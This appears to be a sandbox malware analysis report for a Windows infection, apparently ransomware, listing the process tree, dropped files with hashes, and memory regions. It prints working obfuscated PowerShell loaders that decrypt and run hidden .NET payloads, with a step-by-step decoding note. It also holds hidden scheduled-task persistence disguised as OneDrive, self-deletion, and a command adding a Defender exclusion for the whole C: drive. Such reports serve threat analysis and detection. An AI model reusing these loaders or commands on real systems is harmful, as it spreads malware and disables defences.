    [2] C:\Windows\SysWOW64\WerFault.exe
        command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 428
        - Program crash
[1] C:\Windows\SysWOW64\WerFault.exe
    command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 556 -ip 556
[1] C:\Users\Admin\AppData\Local\Temp\547C.exe
    command line: C:\Users\Admin\AppData\Local\Temp\547C.exe
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    [2] C:\Users\Admin\AppData\Local\Temp\547C.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\547C.exe"
        - Checks computer location settings
        - Executes dropped EXE
        [3] C:\Windows\SysWOW64\cmd.exe
            command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "
            [4] C:\Windows\SysWOW64\cmd.exe
                command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"
                [5] C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe
                    command line: "C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);
                    Decoded: SRD.bat.exe accepts -w hidden -c and runs PowerShell syntax, so it is a PowerShell host under another name. Removing the 'VBDe' filler gives the member names Invoke, CreateDecryptor, Load, TransformFinalBlock, FromBase64String, ChangeExtension, ReadLines, ElementAt, EntryPoint, GetCurrentProcess, Split and MainModule. The script strips the .exe from its own path (ChangeExtension to null) to reach SRD.bat, reads line 2 of that file, drops its first two characters, splits the rest on ':', and for each half does base64 decode, AES-CBC decrypt with the hard-coded key and IV (PKCS7 padding) and GZip inflate, then loads the result with Assembly.Load and calls its EntryPoint, the second half first.
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4112);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TbvDl' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TbvDl.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\sv.bat.exe"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI 
([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);5⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2024);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TYjHE' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TYjHE.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force6⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4152 -ip 41521⤵
-
C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exeC:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe1⤵
Downloads
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[CF072F13-3483].[[email protected]].8base
Filesize
3.2MB
MD5
4be32a0a4eabdf02dffc15ff149a189a
SHA1
5391390845c9f728a42809d547fafe8aa794e2aa
SHA256
abc142eacf656930c30c7c0610952a0dbd57f44f60bcf642b5141fd628fef99d
SHA512
1996aab5b64d44c0e784365ab587fb5cfb510a2b543c9f7b495579f70031f671933b6d085cb94ef13f07c72d67a349b684b4a528829ccd69f854509e7c07c4a8
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\3EBF.exe
Filesize
221KB
MD5
8a62691e9921ee88ab036aba6f9e45eb
SHA1
288d8268254bf799aef8db58beb18cb35fd903a1
SHA256
a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512
75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44
-
C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe
Filesize
1.4MB
MD5
4ee88295d65b7a6e566d200a1c842801
SHA1
5dfb320e933425cea8188f8f7dab346796c3b090
SHA256
b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512
caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB
MD5
34d461b8b826e81426975ca16787672f
SHA1
82737839fcf9e0f0eca8a879035ea512fd2edaa4
SHA256
45f4b6bf317f54ca9f783d88793ffd40ea9b43f3d89ac3d4c494031945a03705
SHA512
1891e62ecff1cc6b96b9834358a07dd33818e8f4f42f67967fdc72da5cf68df6bb8d7ac26e1401aef51af480514e7ee5582cc0af7abfbc879597ffc2e8d6f89e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
50KB
MD5
05485a4a4a5bf5010ecfaacfbded0e59
SHA1
06791a9950fc9b36f508c03d170152708f749efd
SHA256
cf7243dfd9c76a26c03b2d267ddd762a73b96e3dbd1d32515c9a00f276406d13
SHA512
b526bc16f39d884a87782da55392f5c2e763d313928e84e338a0052c33345c1beab609c364f66db90e7e7acdde1bfa601a1d816084adee5745afba7b319bd429
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
50KB
MD5
bf0a14f208d096d00509ceeb270c4be6
SHA1
182d7e4a6e1996a85a12f49fcfd1cc0f5f00495d
SHA256
1e32e5c0ffd9fb6acabd829589044d5735e55f8464a14788ba59ae5c50f3bb31
SHA512
a3224238dfde7d20ad703e84b0c0e0f7dc6bfc007dee7a1dc469537b57d4ae1ef2ac81e33a537f929cce053f5022da2a85fe2143b22bdb32914e17f046184d1b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB
MD5
3337d66209faa998d52d781d0ff2d804
SHA1
6594b85a70f998f79f43cdf1ca56137997534156
SHA256
9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA512
8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB
MD5
8a51d636f6d2d422ce072fe927aacbe3
SHA1
161a11fff5e9bebcb6a7a0263c6e7a18274a5209
SHA256
d5bc50684315205c5c745348d39cff2351d0e6bf2e79774bd35c7732465876a9
SHA512
8426fcf1edf5b3f49ad32825e455bb5580caf65ce8ee01b16c8410d56e31cc3e9dce19178fa89e3a921e35838552a53f1e0cf29b3e16cbc99c0600e9327262d2
-
C:\Users\Admin\AppData\Local\Temp\3C2E.exe
Filesize
1.4MB
MD5
4ee88295d65b7a6e566d200a1c842801
SHA1
5dfb320e933425cea8188f8f7dab346796c3b090
SHA256
b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512
caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4
-
C:\Users\Admin\AppData\Local\Temp\3EBF.exe
Filesize
221KB
MD5
8a62691e9921ee88ab036aba6f9e45eb
SHA1
288d8268254bf799aef8db58beb18cb35fd903a1
SHA256
a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512
75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44
-
C:\Users\Admin\AppData\Local\Temp\42D7.exe
Filesize
220KB
MD5
8d7ebe871589d79f195f240dcef43a57
SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd
-
C:\Users\Admin\AppData\Local\Temp\547C.exe
Filesize
6.3MB
MD5
6992433acbb1398c0b539d1cafdf47c4
SHA1
6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256
5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512
2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc
-
C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll
Filesize
2.3MB
MD5
5f449db8083ca4060253a0b4f40ff8ae
SHA1
2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256
7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512
4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f
-
C:\Users\Admin\AppData\Local\Temp\SRD.bat
Filesize
394KB
MD5
809325b0bf02d5f44ce3d005b018cc12
SHA1
c39206a6b0e5dfaf5d4a50c5887b8400d55eda87
SHA256
136c478f4bd8baf478b13a43d31d62d69669c40453ca3fe81ddfebe2ff6ab0c4
SHA512
a8b1ee15056f625ebe89a9968b2820c7bad7fc76197f705d785ecee78fbe93355cae2d784cadfdf68fc23533ab2bc8e3bd67de9e1bba07b1c4f5d6c3529a7473
-
C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe
Filesize
423KB
MD5
c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdfjcnn0.tct.ps1
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
Filesize
220KB
MD5
a780dd7a5ed788b79d157339f69bbad4
SHA1
7e10cd37e03420947d45c0374b05f23e058731e9
SHA256
78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778
SHA512
e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd
-
C:\Users\Admin\AppData\Local\Temp\s777mx.exe
Filesize
220KB
MD5
8d7ebe871589d79f195f240dcef43a57
SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd
-
C:\Users\Admin\AppData\Local\Temp\sv.bat
Filesize
78KB
MD5
ca039530887fa8dce08b07808582c4c7
SHA1
15b27c115ecf430bb3adccba408e6cdd6b94945c
SHA256
567b3fbd05b70248c6961e4cf5fc0196ae3f84d190402ca0d72e849007baf393
SHA512
9e7c3f51791c4c6aaa745622ae698cec04a75cbc716b267b4f258d599f56befab3d7142e2ce6dcac4d46d444fe2225c987ba1662788e47c39eb8538b7ab050d8
-
C:\Users\Admin\AppData\Local\Temp\sv.bat.exe
Filesize
423KB
MD5
c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Memory dump    Filesize
memory/544-954-0x00000000001A0000-0x00000000001AF000-memory.dmp    60KB
memory/544-930-0x0000000001300000-0x000000000130B000-memory.dmp    44KB
memory/1424-396-0x0000000000FF0000-0x000000000164E000-memory.dmp    6.4MB
memory/1424-424-0x0000000006070000-0x0000000006080000-memory.dmp    64KB
memory/1424-439-0x00000000707B0000-0x0000000070D90000-memory.dmp    5.9MB
memory/1644-445-0x0000000000630000-0x000000000063C000-memory.dmp    48KB
memory/1856-206-0x0000000003630000-0x0000000003639000-memory.dmp    36KB
memory/2176-170-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-139-0x0000000004D60000-0x0000000005388000-memory.dmp    6.2MB
memory/2176-158-0x0000000007660000-0x0000000007CDA000-memory.dmp    6.5MB
memory/2176-155-0x00000000061F0000-0x0000000006234000-memory.dmp    272KB
memory/2176-162-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-154-0x0000000005C70000-0x0000000005C8E000-memory.dmp    120KB
memory/2176-153-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-152-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-169-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-141-0x0000000005390000-0x00000000053F6000-memory.dmp    408KB
memory/2176-144-0x0000000005630000-0x0000000005696000-memory.dmp    408KB
memory/2176-138-0x00000000046F0000-0x0000000004726000-memory.dmp    216KB
memory/2176-156-0x0000000006F60000-0x0000000006FD6000-memory.dmp    472KB
memory/2176-157-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-159-0x0000000007000000-0x000000000701A000-memory.dmp    104KB
memory/2176-171-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-173-0x00000000046E0000-0x00000000046F0000-memory.dmp    64KB
memory/2176-140-0x0000000004CC0000-0x0000000004CE2000-memory.dmp    136KB
memory/2176-160-0x0000000007D50000-0x0000000007D72000-memory.dmp    136KB
memory/2228-134-0x0000000005AA0000-0x0000000006044000-memory.dmp    5.6MB
memory/2228-168-0x0000000005520000-0x0000000005530000-memory.dmp    64KB
memory/2228-133-0x0000000000CC0000-0x0000000000D0C000-memory.dmp    304KB
memory/2228-137-0x0000000005520000-0x0000000005530000-memory.dmp    64KB
memory/2228-136-0x0000000005640000-0x000000000564A000-memory.dmp    40KB
memory/2228-135-0x0000000005590000-0x0000000005622000-memory.dmp    584KB
memory/2500-1656-0x0000000000430000-0x000000000043C000-memory.dmp    48KB
memory/2500-1658-0x0000000000B40000-0x0000000000B49000-memory.dmp    36KB
memory/2992-254-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-247-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-266-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-268-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-270-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-272-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-275-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-277-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-279-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-284-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-281-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-286-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-288-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-290-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-294-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-292-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-296-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-261-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-259-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-228-0x000002BC689A0000-0x000002BC68B0A000-memory.dmp    1.4MB
memory/2992-249-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-229-0x000002BC6A790000-0x000002BC6A7A0000-memory.dmp    64KB
memory/2992-1317-0x000002BC6A790000-0x000002BC6A7A0000-memory.dmp    64KB
memory/2992-245-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-234-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-243-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-241-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-239-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-237-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-235-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/2992-263-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp    1.2MB
memory/3280-253-0x0000000001C40000-0x0000000001C4F000-memory.dmp    60KB
memory/3292-211-0x0000000002AB0000-0x0000000002AC6000-memory.dmp    88KB
memory/3420-208-0x0000000001BB0000-0x0000000001BB5000-memory.dmp    20KB
memory/3420-216-0x0000000000400000-0x0000000001B38000-memory.dmp    23.2MB
memory/3428-209-0x0000000000400000-0x0000000000409000-memory.dmp    36KB
memory/3428-204-0x0000000000400000-0x0000000000409000-memory.dmp    36KB
memory/3428-212-0x0000000000400000-0x0000000000409000-memory.dmp    36KB
memory/4248-725-0x0000000001300000-0x000000000136B000-memory.dmp    428KB
memory/4248-432-0x0000000001300000-0x000000000136B000-memory.dmp    428KB
memory/4248-426-0x0000000001370000-0x00000000013F0000-memory.dmp    512KB
memory/4256-758-0x0000000001300000-0x0000000001309000-memory.dmp    36KB
memory/4256-703-0x0000000000630000-0x000000000063C000-memory.dmp    48KB
memory/4340-1835-0x00000000001B0000-0x00000000001B9000-memory.dmp    36KB
memory/4340-1822-0x0000000000B40000-0x0000000000B49000-memory.dmp    36KB
memory/4380-1893-0x00000000001B0000-0x00000000001B9000-memory.dmp    36KB
memory/4380-1922-0x0000000000370000-0x0000000000397000-memory.dmp    156KB
memory/4500-918-0x0000000001300000-0x000000000130B000-memory.dmp    44KB
memory/4500-915-0x0000000001300000-0x0000000001309000-memory.dmp    36KB
memory/4696-1500-0x0000000001300000-0x0000000001309000-memory.dmp    36KB
memory/4696-1502-0x0000000000430000-0x000000000043C000-memory.dmp    48KB
memory/4716-174-0x0000000018440000-0x0000000018450000-memory.dmp    64KB
memory/4716-177-0x0000000019BB0000-0x0000000019C00000-memory.dmp    320KB
memory/4716-176-0x000000001B8C0000-0x000000001BDEC000-memory.dmp    5.2MB
memory/4716-175-0x000000001B1C0000-0x000000001B382000-memory.dmp    1.8MB
memory/4716-167-0x0000000018440000-0x0000000018450000-memory.dmp    64KB
memory/4716-166-0x0000000018400000-0x000000001843C000-memory.dmp    240KB
memory/4716-165-0x00000000183A0000-0x00000000183B2000-memory.dmp    72KB
memory/4716-164-0x0000000018660000-0x000000001876A000-memory.dmp    1.0MB
memory/4716-163-0x0000000018B70000-0x0000000019188000-memory.dmp    6.1MB
memory/4716-161-0x0000000000400000-0x0000000000430000-memory.dmp    192KB
memory/4776-1340-0x0000000001300000-0x0000000001309000-memory.dmp    36KB
memory/4940-739-0x0000000000AF0000-0x0000000000AFB000-memory.dmp    44KB